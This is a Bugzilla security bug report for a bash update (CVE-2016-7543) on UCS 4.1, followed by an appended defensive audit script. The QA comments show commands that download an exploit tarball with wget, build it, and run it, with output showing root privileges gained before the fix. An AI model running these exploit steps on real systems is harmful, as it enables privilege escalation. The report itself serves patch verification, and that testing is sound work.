Univention Bugzilla – Full Text Bug Listing
Summary: | bash: Multiple issues (4.1) | ||
---|---|---|---|
Product: | UCS | Reporter: | Arvid Requate <requate> |
Component: | Security updates | Assignee: | Arvid Requate <requate> |
Status: | CLOSED FIXED | QA Contact: | Florian Best <best> |
Severity: | normal | ||
Priority: | P5 | CC: | best |
Version: | UCS 4.1 | Flags: | requate: Patch_Available+ |
Target Milestone: | UCS 4.1-4-errata | ||
Hardware: | Other | ||
OS: | Linux | ||
What kind of report is it?: | Security Issue | What type of bug is this?: | --- |
Who will be affected by this bug?: | --- | How will those affected feel about the bug?: | --- |
User Pain: | | Enterprise Customer affected?: | |
School Customer affected?: | | ISV affected?: | |
Waiting Support: | | Flags outvoted (downgraded) after PO Review: | |
Ticket number: | | Bug group (optional): | |
Max CVSS v3 score: | | | |
Attachments: | exploit.tar.gz |
Description
Arvid Requate
2016-11-08 11:55:45 CET
    /usr/lib/vmware/bin/vmware-vmx-stats
    /usr/lib/vmware/bin/vmware-vmx-debug
    /usr/lib/vmware/bin/vmware-vmx
    /usr/bin/vmware-mount
    /usr/sbin/vmware-authd
    /sbin/mount.cifs

To show the infected binaries:

    find / -perm -4000 -type f -exec sh -c 'objdump -T {} | egrep -q "\<popen|system\>"' \; -fprint /dev/stdout

OK:

    *** 4.2+dfsg-0.1.51.201611101755 0
        500 http://omar.knut.univention.de/build2/ ucs_4.1-0-errata4.1-4/amd64/ Packages

OK: zgrep CVE-2016-7543 /usr/share/doc/bash/changelog.Debian.gz
OK: YAML
OK: bash still works

I could not reproduce it with this exploit: http://seclists.org/oss-sec/2016/q3/617

Created attachment 8255
exploit.tar.gz

OK: reproduce

    # cd /tmp/
    # wget http://apt.inguza.net/wheezy-security/bash/exploit.tar.gz
    # tar xvzf exploit.tar.gz
    # make
    # make root
    # ln -sf bash /bin/sh
    # su Administrator
    bash $ cd /tmp/; make test
    Test 1
    uid=0(root) gid=5000(Domain Admins) groups=0(root),1005(Windows Hosts),5000(Domain Admins),5001(Dom/bin/date
    Tue Nov 29 19:17:07 CET 2016
    Test 2
    uid=33(www-data) gid=5000(Domain Admins) groups=33(www-data),1005(Windows Hosts),5000(Domain Admins/bin/date
    Tue Nov 29 19:17:07 CET 2016
    Test 3
    uid=2002(Administrator) gid=5000(Domain Admins) groups=5000(Domain Admins),1005(Windows Hosts),5001/bin/date

~OK: fixed version:

    ls -l exploit1 exploit2 exploit3
    -rwsr-xr-x 1 root root 6920 Nov 29 19:12 exploit1
    -rwsr-xr-x 1 root root 6920 Nov 29 19:12 exploit2
    -rwxr-xr-x 1 www-data root 6804 Nov 29 19:12 exploit3

    ./test.sh
    Test 1
    + /bin/date
    Tue Nov 29 19:27:31 CET 2016
    Test 2
    uid=33(www-data) gid=5000(Domain Admins) groups=33(www-data),1005(Windows Hosts),5000(Domain Admins/bin/date
    Tue Nov 29 19:27:31 CET 2016
    Test 3
    uid=2002(Administrator) gid=5000(Domain Admins) groups=5000(Domain Admins),1005(Windows Hosts),5001/bin/date
    Tue Nov 29 19:27:31 CET 2016

I still think that it is wrong that the code is executed in Test 2 and Test 3. In "Test 2" the code is executed as www-data. But well, the most critical thing is fixed.
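
The checks recorded in this report (setuid binaries that import popen or system, /bin/sh linked to bash, and the changelog entry for CVE-2016-7543) can be combined into one host audit. The script below is an added example, not part of the bug report; the function names, the `--scan` switch and the sample objdump lines are assumptions made for illustration, and it matches exact imported symbol names.

```sh
#!/bin/sh
# Added example, not from the bug report. Function names and the --scan
# switch are assumptions made for this illustration.

# Constructed `objdump -T` lines: one binary that imports popen, and one that
# only imports a look-alike name and defines its own `system`.
SAMPLE_HIT='0000000000000000      DF *UND*  0000000000000000  GLIBC_2.2.5 popen
0000000000000000      DF *UND*  0000000000000000  GLIBC_2.2.5 setuid'
SAMPLE_MISS='0000000000000000      DF *UND*  0000000000000000  GLIBC_2.2.5 my_system
0000000000001040 g    DF .text  0000000000000020  Base        system'

# Read `objdump -T` output on stdin; succeed only when an undefined (imported)
# dynamic symbol is named exactly popen or system.
imports_shell_call() {
    awk '/\*UND\*/ && ($NF == "popen" || $NF == "system") { hit = 1 }
         END { exit !hit }'
}

# Print every setuid file under $1 (default /) that imports popen or system.
audit_setuid() {
    find "${1:-/}" -perm -4000 -type f 2>/dev/null |
    while IFS= read -r bin; do
        if objdump -T "$bin" 2>/dev/null | imports_shell_call; then
            printf '%s\n' "$bin"
        fi
    done
}

# Succeed when the given path (default /bin/sh) resolves to a file named bash.
sh_is_bash() {
    [ "$(basename "$(readlink -f "${1:-/bin/sh}")")" = bash ]
}

# Succeed when the installed bash changelog names the CVE (the QA check above).
changelog_mentions_fix() {
    zgrep -q CVE-2016-7543 /usr/share/doc/bash/changelog.Debian.gz 2>/dev/null
}

if [ "${1:-}" = "--scan" ]; then
    if sh_is_bash; then echo "/bin/sh resolves to bash"; fi
    if changelog_mentions_fix; then
        echo "bash changelog mentions CVE-2016-7543"
    else
        echo "bash changelog does not mention CVE-2016-7543"
    fi
    echo "setuid binaries importing popen or system:"
    audit_setuid /
fi
```

Run it as root with `--scan` so that `find` can read every directory; without the switch it only defines the functions.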